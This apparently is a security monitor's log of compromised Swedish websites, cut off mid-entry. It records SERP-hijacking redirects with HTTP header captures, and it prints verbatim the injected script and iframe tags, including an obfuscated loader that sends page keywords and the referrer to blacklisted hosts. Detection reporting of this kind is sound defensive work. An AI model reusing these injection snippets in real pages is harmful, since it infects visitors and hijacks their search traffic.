Säkrare hemsida med .sehttp://adventure-academy.se/ (192.185.85.61) - Serp-hijackingAttacked url: http://adventure-academy.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 19 Oct 2018 09:43:16 +0200<br><br>Visitors with referer are redirected to http://universalic.info/api/redirect?offerid=47&amp;sourceid=5197&amp;landingid=356&amp;subid_1=Alpha <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: adventure-academy.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.14.0 <br>Date: Fri, 19 Oct 2018 07:43:28 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Pragma: no-cache <br>Expires: Wed, 11 Jan 1984 05:00:00 GMT <br>Cache-Control: no-cache, must-revalidate, max-age=0 <br>Set-Cookie: visits=1539935006; expires=Tue, 19-Jan-2038 03:14:07 GMT <br>Set-Cookie: PHPSESSID=cc8a5f3edb86fddd6e9fbf1169a9b328; path=/ <br>Location: http://www.adventure-academy.se/ <br>X-Endurance-Cache-Level: 2 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: adventure-academy.se <br>Referer: http://www.google.com/search?q=adventure-academy.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Server: nginx/1.14.0 <br>Date: Fri, 19 Oct 2018 07:43:25 GMT <br>Content-Type: text/html; charset=utf-8 <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: visits=1539935005; expires=Tue, 19-Jan-2038 03:14:07 GMT <br>Set-Cookie: PHPSESSID=f7806d91a1d179891413fc85218370c6; path=/ <br>Set-Cookie: e855537258ac5146b4895e5e719d4ab79dcbc0be=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjE0XCI6MTUzOTkzNDk3MX0sXCJjYW1wYWlnbnNcIjp7XCIxXCI6MTUzOTkzNDk3MX0sXCJ0aW1lXCI6MTUzOTkzNDk3MX0ifQ.KuQsubAk-ULkV6Q0kEnlLGWRSfPPTHHYGk6xkqNzbTM; expires=Sat, 20-Oct-2018 07:43:25 GMT; path=/; domain=.adventure-academy.se <br>Location: http://universalic.info/api/redirect?offerid=47&amp;sourceid=5197&amp;landingid=356&amp;subid_1=Alpha <br>X-Endurance-Cache-Level: 2<br><br>adventure-academy.se is on 192.185.85.61<br>ASN for 192.185.85.61: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.85.61 corresponds with 192-185-85-61.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1539958690http://adventure-academy.se/ (192.185.85.61) - Serp-hijackingAttacked url: http://adventure-academy.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 18 Oct 2018 09:14:36 +0200<br><br>Visitors with referer are redirected to http://universalic.info/api/redirect?offerid=47&amp;sourceid=5197&amp;landingid=356&amp;subid_1=Alpha <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: adventure-academy.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.14.0 <br>Date: Thu, 18 Oct 2018 07:14:47 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Pragma: no-cache <br>Expires: Wed, 11 Jan 1984 05:00:00 GMT <br>Cache-Control: no-cache, must-revalidate, max-age=0 <br>Set-Cookie: visits=1539846877; expires=Tue, 19-Jan-2038 03:14:07 GMT <br>Set-Cookie: PHPSESSID=7778a947c745ce9bcc78d1f1c319d047; path=/ <br>Location: http://www.adventure-academy.se/ <br>X-Endurance-Cache-Level: 2 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: adventure-academy.se <br>Referer: http://www.google.com/search?q=adventure-academy.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Server: nginx/1.14.0 <br>Date: Thu, 18 Oct 2018 07:14:36 GMT <br>Content-Type: text/html; charset=utf-8 <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: visits=1539846876; expires=Tue, 19-Jan-2038 03:14:07 GMT <br>Set-Cookie: PHPSESSID=3d2c04861147ba10966f301b4b0b541c; path=/ <br>Set-Cookie: e855537258ac5146b4895e5e719d4ab79dcbc0be=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjE0XCI6MTUzOTg0Njg0MH0sXCJjYW1wYWlnbnNcIjp7XCIxXCI6MTUzOTg0Njg0MH0sXCJ0aW1lXCI6MTUzOTg0Njg0MH0ifQ.8TTCRZUdnNmgtcGoknyWNgVXpXNKTkhwJ7GB_o66L7E; expires=Fri, 19-Oct-2018 07:14:36 GMT; path=/; domain=.adventure-academy.se <br>Location: http://universalic.info/api/redirect?offerid=47&amp;sourceid=5197&amp;landingid=356&amp;subid_1=Alpha <br>X-Endurance-Cache-Level: 2<br><br>adventure-academy.se is on 192.185.85.61<br>ASN for 192.185.85.61: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.85.61 corresponds with 192-185-85-61.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1539874159http://adventure-academy.se/ (192.185.85.61) - Serp-hijackingAttacked url: http://adventure-academy.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 01 Oct 2018 21:18:42 +0200<br><br>Visitors with referer are redirected to http://universalic.info/api/redirect?offerid=47&amp;sourceid=5197&amp;landingid=356&amp;subid_1=Alpha <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: adventure-academy.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.14.0 <br>Date: Mon, 01 Oct 2018 19:18:53 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Pragma: no-cache <br>Expires: Wed, 11 Jan 1984 05:00:00 GMT <br>Cache-Control: no-cache, must-revalidate, max-age=0 <br>Set-Cookie: visits=1538421526; expires=Tue, 19-Jan-2038 03:14:07 GMT <br>Set-Cookie: PHPSESSID=445c01008b473fec50c3c0e9053de39b; path=/ <br>Location: http://www.adventure-academy.se/ <br>X-Endurance-Cache-Level: 2 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: adventure-academy.se <br>Referer: http://www.google.com/search?q=adventure-academy.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Server: nginx/1.14.0 <br>Date: Mon, 01 Oct 2018 19:18:45 GMT <br>Content-Type: text/html; charset=utf-8 <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: visits=1538421525; expires=Tue, 19-Jan-2038 03:14:07 GMT <br>Set-Cookie: PHPSESSID=917a8dbf4409c7783eb4672cd8ba8005; path=/ <br>Set-Cookie: e855537258ac5146b4895e5e719d4ab79dcbc0be=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjE0XCI6MTUzODQyMTQ2Nn0sXCJjYW1wYWlnbnNcIjp7XCIxXCI6MTUzODQyMTQ2Nn0sXCJ0aW1lXCI6MTUzODQyMTQ2Nn0ifQ.6Lg_BBAyQuGeH3pN17on9uIzW6UHBR4-KpitYsAqKuU; expires=Tue, 02-Oct-2018 19:18:45 GMT; path=/; domain=.adventure-academy.se <br>Location: http://universalic.info/api/redirect?offerid=47&amp;sourceid=5197&amp;landingid=356&amp;subid_1=Alpha <br>X-Endurance-Cache-Level: 2<br><br>adventure-academy.se is on 192.185.85.61<br>ASN for 192.185.85.61: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.85.61 corresponds with 192-185-85-61.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1538482132http://holmpartner.se/ (192.185.169.113) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://printlegacyru.401.com1.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>holmpartner.se is on 192.185.169.113<br>ASN for 192.185.169.113: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.169.113 corresponds with 192-185-169-113.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1479715134http://itfokus.se/ (192.185.158.163) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>itfokus.se is on 192.185.158.163<br>ASN for 192.185.158.163: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.158.163 corresponds with 192-185-158-163.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1467711053http://entira.se/ (192.185.140.219) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>entira.se is on 192.185.140.219<br>ASN for 192.185.140.219: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.140.219 corresponds with ns916.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@softlayer.com abuse@websitewelcome.com1467706987http://carevin.se/ (192.185.165.92) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>carevin.se is on 192.185.165.92<br>ASN for 192.185.165.92: 20013<br>Abusix contact information: (information only)<br>192.185.165.92 corresponds with 192-185-165-92.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1467704964http://jasmin.nu/ (192.185.2.61) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>jasmin.nu is on 192.185.2.61<br>ASN for 192.185.2.61: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.2.61 corresponds with geo.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@websitewelcome.com abuse@softlayer.com1467701778http://holmpartner.se/ (192.185.169.113) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://printlegacyru.401.com1.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>holmpartner.se is on 192.185.169.113<br>ASN for 192.185.169.113: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.169.113 corresponds with 192-185-169-113.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1467612808http://lastbilstillbehor.se/ (192.185.5.142) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://informationking.com/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://informationking.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://informationking.com/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>lastbilstillbehor.se is on 192.185.5.142<br>ASN for 192.185.5.142: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.5.142 corresponds with ns8039.hostgator.com<br>Abuse.net has 1 reliable address(es) for hostgator.com<br>Found address(es): abuse@hostgator.com1467612671http://itfokus.se/ (192.185.158.163) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>itfokus.se is on 192.185.158.163<br>ASN for 192.185.158.163: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.158.163 corresponds with 192-185-158-163.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1467362964http://jasmin.nu/ (192.185.2.61) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>jasmin.nu is on 192.185.2.61<br>ASN for 192.185.2.61: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.2.61 corresponds with geo.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@websitewelcome.com abuse@softlayer.com1467362750http://entira.se/ (192.185.140.219) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>entira.se is on 192.185.140.219<br>ASN for 192.185.140.219: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.140.219 corresponds with ns916.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@websitewelcome.com abuse@softlayer.com1467355318http://carevin.se/ (192.185.165.92) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>carevin.se is on 192.185.165.92<br>ASN for 192.185.165.92: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.165.92 corresponds with 192-185-165-92.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1467355000http://imad.se/ (192.185.165.86) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>imad.se is on 192.185.165.86<br>ASN for 192.185.165.86: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.165.86 corresponds with ns1668.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@softlayer.com abuse@websitewelcome.com1467274173http://holmpartner.se/ (192.185.169.113) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://printlegacyru.401.com1.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>holmpartner.se is on 192.185.169.113<br>ASN for 192.185.169.113: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.169.113 corresponds with 192-185-169-113.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1463483486http://lastbilstillbehor.se/ (192.185.5.142) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://informationking.com/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://informationking.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://informationking.com/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>lastbilstillbehor.se is on 192.185.5.142<br>ASN for 192.185.5.142: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.5.142 corresponds with ns8039.hostgator.com<br>Abuse.net has 1 reliable address(es) for hostgator.com<br>Found address(es): abuse@hostgator.com1463476596http://holmpartner.se/ (192.185.169.113) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://printlegacyru.401.com1.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://printlegacyru.401.com1.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>holmpartner.se is on 192.185.169.113<br>ASN for 192.185.169.113: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.169.113 corresponds with 192-185-169-113.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1461826850http://lastbilstillbehor.se/ (192.185.5.142) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://informationking.com/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://informationking.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://informationking.com/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>lastbilstillbehor.se is on 192.185.5.142<br>ASN for 192.185.5.142: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.5.142 corresponds with ns8039.hostgator.com<br>Abuse.net has 1 reliable address(es) for hostgator.com<br>Found address(es): abuse@hostgator.com1461826413http://taktil.nu/ (192.185.160.240) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://chiltonsondemand.com/js/jquery.min.php?c_utt=G91825&amp;c_utm='+encodeURIComponent('http://chiltonsondemand.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://chiltonsondemand.com/js/jquery.min.php?c_utt=G91825&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>taktil.nu is on 192.185.160.240<br>ASN for 192.185.160.240: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.160.240 corresponds with 192-185-160-240.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1457683608http://framtidvallentuna.se/ (192.185.25.249) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://vzspxur.deltasig.xyz:42328/slide/1359911/most-stephen-frog-draught-safety&quot; width=&quot;250&quot; height=&quot;250&quot;&gt;<br><br>Offensive url: http://vzspxur.deltasig.xyz:42328/slide/1359911/most-stephen-frog-draught-safety<br>Url is blacklisted in Google Safe Browsing<br><br>framtidvallentuna.se is on 192.185.25.249<br>ASN for 192.185.25.249: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.25.249 corresponds with ns149.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@softlayer.com abuse@websitewelcome.com1441958992http://silica.nu/index.php (192.185.57.32) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://rosytech.ro/ndnmjc38.php?id=13563688&quot;&gt;<br><br>Offensive url: http://rosytech.ro/ndnmjc38.php?id=13563688<br>Url is blacklisted in Google Safe Browsing<br><br>silica.nu is on 192.185.57.32<br>ASN for 192.185.57.32: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.57.32 corresponds with ns139.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@theplanet.com abuse@websitewelcome.com1414745578http://silica.nu/ (192.185.57.32) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://rosytech.ro/ndnmjc38.php?id=13563688&quot;&gt;<br><br>Offensive url: http://rosytech.ro/ndnmjc38.php?id=13563688<br>Url is blacklisted in Google Safe Browsing<br><br>silica.nu is on 192.185.57.32<br>ASN for 192.185.57.32: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.57.32 corresponds with ns139.websitewelcome.com<br>Abuse.net has 2 reliable address(es) for websitewelcome.com<br>Found address(es): abuse@theplanet.com abuse@websitewelcome.com1414745574http://wermlandia.se/ad-category/elektronilk/ (192.185.185.250) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://huisinlenk.nl/cgi-bin/dpbx6mrh.php?id=13849620&quot;&gt;<br><br>Offensive url: http://huisinlenk.nl/cgi-bin/dpbx6mrh.php?id=13849620<br>Url is blacklisted in Google Safe Browsing<br><br>wermlandia.se is on 192.185.185.250<br>ASN for 192.185.185.250: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.185.250 corresponds with 192-185-185-250.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1410503821http://euro-trade.se/index.htm (192.185.182.14) - Serp-hijackingAttacked url: http://euro-trade.se/index.htm<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 25 Jun 2014 23:52:55 +0200<br><br>Visitors with referer are redirected to http://hotelruralrocaabade.com/relay.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Wed, 25 Jun 2014 21:52:55 GMT <br>Content-Type: text/html <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: PHPSESSID=5ded773e7d0b18ccb59c4a82652229ef; path=/ <br>Location: http://euro-trade.se/index.htm <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Referer: http://www.google.com/search?q=euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Wed, 25 Jun 2014 21:52:55 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://hotelruralrocaabade.com/relay.php<br><br>euro-trade.se is on 192.185.182.14<br>ASN for 192.185.182.14: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.182.14 corresponds with 192-185-182-14.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1403761889http://euro-trade.se/contact-us.htm (192.185.182.14) - Serp-hijackingAttacked url: http://euro-trade.se/contact-us.htm<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 25 Jun 2014 10:56:17 +0200<br><br>Visitors with referer are redirected to http://hotelruralrocaabade.com/relay.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Wed, 25 Jun 2014 08:56:17 GMT <br>Content-Type: text/html <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: PHPSESSID=ed5d9d2c9052d4faf505aa258616fda5; path=/ <br>Location: http://euro-trade.se/index.htm <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Referer: http://www.google.com/search?q=euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: 